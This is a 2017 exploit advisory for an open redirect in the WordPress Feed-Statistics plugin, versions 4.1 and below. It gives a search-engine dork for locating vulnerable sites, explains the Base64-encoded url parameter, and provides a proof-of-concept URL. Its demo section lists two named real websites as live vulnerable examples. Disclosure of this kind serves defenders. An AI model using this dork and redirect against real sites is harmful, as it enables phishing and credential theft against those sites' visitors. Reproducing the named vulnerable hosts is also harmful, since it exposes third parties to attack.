WordPress Feed-Statistics 4.1 Open Redirect

WordPress Feed-Statistics plugin versions 4.1 and below suffer from an open redirection vulnerability.


MD5 | 1f8cfc15a5ccfc95a84ac1d880647631

[+] Title: WordPress feed-statistics Plugin Open Redirect Vulnerability
[+] Date: 2017-12-20
[+] Author: Mostafa Gharzi
[+] Vendor Homepage: www.WordPress.org
[+] Tested on: Windows 10 & Kali Linux
[+] Vulnerable File: /feed-statistics.php?url=
[+] Vulnerable Parameter: Get Method
[+} Dork :
inurl:/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=

### Notes:

Unvalidated Redirects vulnerability in feed-statistics Plugin of WordPress
, allows when application accepts untrusted input that could cause the web
application to redirect the request to a URL contained within an untrusted
input. By modifying untrusted URLs into a malicious site, an attacker can
successfully launch a phishing and steal user credentials.

### URL Encoded by Base64:

[+] Example: https://www.google.com/
==> Base64 Algorithm
==> aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=

### POC:

[+}
http://Site/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=[URL
Encoded by Base64]

### Demo:

[+]
http://blog.caplin.com/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=

[+]
http://fabianferber.de/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=

### Special Thanks:
[+] CertCC.ir
[+] Gucert.ir

Related Posts

Comments